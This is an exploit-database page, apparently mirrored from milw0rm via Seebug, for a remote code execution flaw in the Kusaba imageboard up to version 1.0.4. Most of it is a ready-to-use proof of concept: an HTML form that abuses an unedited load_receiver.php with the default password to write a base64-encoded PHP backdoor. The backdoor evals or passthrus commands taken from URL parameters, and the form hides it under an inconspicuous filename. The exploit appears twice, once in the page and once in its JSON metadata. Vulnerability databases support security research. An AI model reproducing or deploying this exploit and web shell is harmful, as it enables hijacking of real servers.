Search...

Kusaba <= 1.0.4 - Remote Code Execution Exploit (2)

2014-07-01T00:00:00

ID SSV:65820
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                &#60;!--
9 Oct 2008
Kusaba &#60;= 1.0.4 Remote Code Execution Exploit #2
Sausage &#60;tehsausage@gmail.com&#62;

Will work if they have left the load_receiver.php script un-edited.

After execution: (Yes these are the exact URLs)
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?pc=print &#34;Hello&#34;;
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?sc=echo Hello
--&#62;
&#60;pre&#62;
&#60;form action=&#34;./load_receiver.php&#34; method=&#34;POST&#34;&#62;
&#60;input type=&#34;text&#34; name=&#34;password&#34; value=&#34;changeme&#34;&#62; &#60;!-- Don&#39;t actually
change this, unless they have changed their password and you know it --&#62;
&#60;input type=&#34;text&#34; name=&#34;type&#34; value=&#34;direct&#34;&#62;
&#60;input type=&#34;text&#34; name=&#34;file&#34;
value=&#34;PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw==&#34;&#62;
&#60;!-- same backdoor from the paint_save.php exploit --&#62;
&#60;input type=&#34;text&#34; name=&#34;targetname&#34; value=&#34;post.php&#34;&#62; &#60;!-- Any
inconspicuous filename will do --&#62;

&#60;input type=&#34;submit&#34; value=&#34;Exploit&#34;&#62;
&#60;/form&#62;

# milw0rm.com [2008-10-09]

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-65820", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Kusaba <= 1.0.4 - Remote Code Execution Exploit (2)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65820", "cvelist": [], "description": "No description provided by source.", "viewCount": 8, "published": "2014-07-01T00:00:00", "sourceData": "\n \r\n<pre>\r\n<form action="./load_receiver.php" method="POST">\r\n<input type="text" name="password" value="changeme"> \r\n<input type="text" name="type" value="direct">\r\n<input type="text" name="file"\r\nvalue="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw==">\r\n\r\n<input type="text" name="targetname" value="post.php"> \r\n\r\n<input type="submit" value="Exploit">\r\n</form>\r\n\r\n# milw0rm.com [2008-10-09]\r\n\n ", "id": "SSV:65820", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T13:44:13", "reporter": "Root", "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645446168}}

Kusaba &lt;= 1.0.4 - Remote Code Execution Exploit (2)

Description

No description provided by source.

Kusaba <= 1.0.4 - Remote Code Execution Exploit (2)